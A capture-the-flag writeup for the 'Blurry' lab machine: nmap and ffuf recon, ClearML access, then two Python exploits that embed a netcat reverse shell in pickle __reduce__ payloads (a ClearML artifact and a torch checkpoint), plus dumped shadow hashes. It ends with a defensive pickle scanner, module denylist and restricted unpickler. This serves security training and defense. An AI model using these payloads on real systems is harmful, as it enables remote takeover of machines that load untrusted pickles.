Basic information

Port scan

22 and 80:

$ nmap -sC -sV 10.10.11.19
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-11 13:36 CST
Nmap scan report for 10.10.11.19
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.54 seconds

80

Accessing the IP directly redirects to the app subdomain, so add a hosts entry:

10.10.11.19 app.blurry.htb

It is ClearML:

Subdomain scan

Several other subdomains can be found. With ffuf's default options the api subdomain is missed, because it responds with 400 (the second command below adds 400 to the matched status codes):

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://app.blurry.htb/" -H 'Host: FUZZ.blurry.htb' -fs 169

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://app.blurry.htb/" -H 'Host: FUZZ.blurry.htb' -fs 169 -mc 200-299,301,302,307,400,401,403,405,500

files [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 96ms]
app [Status: 200, Size: 13327, Words: 382, Lines: 29, Duration: 93ms]
chat [Status: 200, Size: 218733, Words: 12692, Lines: 449, Duration: 119ms]
api [Status: 400, Size: 280, Words: 4, Lines: 1, Duration: 100ms]

files

The root path only responds with a bare OK:

chat

It is Rocket.Chat:

Register an arbitrary account and log in; some usernames can be collected from the chat:

ClearML

ClearML here only requires a full name to log in. Take a full name from the chat, enter ClearML, then create an API key and do a test run:

(If clearml-init fails to verify the key, manually creating the config file and then running also works.)

~/clearml.conf

shell

ClearML-related vulnerabilities:

Then, following the article, upload a malicious pickle. According to the article it is only triggered when another user fetches (gets) the artifact. The system has a scheduled review job that looks for Tasks in this project carrying the review tag and gets them, so the approach is to create a Task tagged review that carries the malicious pickle and wait for it to trigger:

exp.py

#!/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient
import pickle
import os

class RunCommand:
    # pickle calls __reduce__ when serialising this object; the returned tuple tells
    # whoever unpickles the artifact which callable to invoke and with which argument.
    def __reduce__(self):
        cmd = ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 4444 >/tmp/f")
        return os.system, (cmd,)

# Named `payload` rather than `pickle` so the imported pickle module is not shadowed.
payload = RunCommand()

# task = Task.init(project_name="Miao", task_name="Miao", output_uri=True)
# The "review" tag is what makes the scheduled review job pick this Task up and get the artifact.
task = Task.init(project_name="Black Swan", tags=["review"], task_name="Miao", task_type=Task.TaskTypes.data_processing)
task.upload_artifact(name='Miao Artifact', artifact_object=payload, wait_on_upload=True)

user flag

On the jippity user's desktop; the SSH private key can also be grabbed to make the following steps easier:

Privilege escalation information

jippity can run modules with sudo:

A search turns up:

The idea is to craft a malicious model yourself.

Privilege escalation & root flag

Craft a model yourself, run it, and get root:

shadow

root:$y$j9T$HKjGxAyjzW3lmf/HmZafW0$fgkQykeZSlRYHzR8zHjMVQrRUzwM3xSvA0koPgt6TQ6:19770:0:99999:7:::
jippity:$y$j9T$WUn.W06MZ94pp.Zq4HANr/$UAdCX7HojvUwcmzTO6.xcwCWvxrKneaoRAPqpFf1G6D:19770:0:99999:7:::

exp.py

import torch
import torch.nn as nn
import os

class CustomModel(nn.Module):
    def __init__(self):
        super(CustomModel, self).__init__()
        self.linear = nn.Linear(10, 1)

    def forward(self, x):
        return self.linear(x)

    # torch.save() pickles the whole module object, so this __reduce__ ends up in the
    # .pth file and is invoked by torch.load() on the other side.
    def __reduce__(self):
        cmd = ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 4444 >/tmp/f")
        return os.system, (cmd,)

model = CustomModel()
torch.save(model, 'miao.pth')
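
Both steps above rely on the same weakness: the ClearML artifact and the torch.save() checkpoint are pickles, and whatever fetches them (the review job, the sudo-run evaluation script) unpickles untrusted data. The following is an added defender-side example, not code from the writeup or from ClearML/PyTorch: it lists every module.attribute a pickle would import by walking the opcode stream with pickletools (nothing is executed), applies an allowlist, and loads only through a restricted Unpickler. The zip layout used for the checkpoint sample (a `*/data.pkl` member) mimics the format torch.save() writes, but the sample itself is constructed here without torch; the allowlist and denylist are illustrative assumptions, not official lists. Note that functions from the os module pickle under their real module name (posix on Linux), which is why a denylist that only names "os" is not enough.

```python
"""Added example: static pickle inspection plus allowlisted loading."""
import collections
import io
import os
import pickle
import pickletools
import zipfile

# Assumptions for the example: modules a model/data artifact never needs at load time,
# and the only globals we are willing to resolve. Extend ALLOWED_GLOBALS per project.
DANGEROUS_MODULES = {"os", "posix", "nt", "subprocess", "sys", "socket", "shutil", "builtins"}
ALLOWED_GLOBALS = {("collections", "OrderedDict")}
CALL_OPCODES = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def find_globals(data):
    """Return ([(module, name), ...], number_of_call_opcodes) without unpickling.
    Tracks string constants and the memo so a protocol-4 STACK_GLOBAL resolves
    even when the module name was memoized and re-used via BINGET (heuristic)."""
    found, calls, strings, memo, last = [], 0, [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if "UNICODE" in name or "STRING" in name:   # string constant pushed
            strings.append(arg)
            last = arg
        elif name == "MEMOIZE":                     # memo slot = next free index
            memo[len(memo)] = last
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            if isinstance(last, str):
                strings.append(last)
        elif name == "GLOBAL":                      # protocol <4: "module name"
            mod, attr = arg.split(" ", 1)
            found.append((mod, attr))
            last = None
        elif name == "STACK_GLOBAL":                # protocol 4+: two strings on the stack
            attr = strings.pop() if strings else None
            mod = strings.pop() if strings else None
            found.append((mod, attr))
            last = None
        else:
            if name in CALL_OPCODES:
                calls += 1
            last = None
    return found, calls


def scan_pickle(data):
    """Classify a pickle: 'block' (dangerous module), 'review' (unknown global), or 'ok'."""
    found, calls = find_globals(data)
    blocked = [g for g in found if g[0] in DANGEROUS_MODULES]
    unknown = [g for g in found if g not in ALLOWED_GLOBALS and g[0] not in DANGEROUS_MODULES]
    verdict = "block" if blocked else ("review" if unknown else "ok")
    return {"verdict": verdict, "globals": found, "blocked": blocked, "unknown": unknown, "calls": calls}


def scan_torch_checkpoint(blob):
    """torch.save() in zip format keeps the pickled object graph in <name>/data.pkl;
    scan every such member of the archive without loading it."""
    reports = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for member in zf.namelist():
            if member.endswith("data.pkl"):
                reports[member] = scan_pickle(zf.read(member))
    return reports


class RestrictedUnpickler(pickle.Unpickler):
    """find_class runs before any REDUCE, so a disallowed global is rejected before it is called."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_loadable(data):
    try:
        safe_load(data)
        return True
    except pickle.UnpicklingError:
        return False


class _SuspiciousObject:
    """Constructed sample: __reduce__ makes the unpickler call a function from os.
    os.getcwd is harmless; the shape is the same as the artifacts in the writeup."""
    def __reduce__(self):
        return (os.getcwd, ())


def make_samples():
    """Constructed inputs: plain dict, allowlisted OrderedDict, os-calling object, fake checkpoint."""
    benign = pickle.dumps({"weights": [0.1, 0.2, 0.3], "epoch": 3})
    allowed = pickle.dumps(collections.OrderedDict(a=1))
    suspicious = pickle.dumps(_SuspiciousObject())
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:      # mimics torch's zip layout; not produced by torch
        zf.writestr("archive/data.pkl", suspicious)
        zf.writestr("archive/version", "3")
    return benign, allowed, suspicious, buf.getvalue()


if __name__ == "__main__":
    for label, blob in zip(("benign", "allowed", "suspicious"), make_samples()[:3]):
        print(label, scan_pickle(blob)["verdict"], "loadable:", is_loadable(blob))
    print("checkpoint", scan_torch_checkpoint(make_samples()[3]))
```

In a pipeline the scan runs on the raw bytes before any `pickle.load`/`torch.load`, and the restricted unpickler (or `torch.load(..., weights_only=True)` together with saving only a `state_dict`) is the second line of defence; the scan by itself is a heuristic and does not replace refusing to unpickle untrusted input.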

References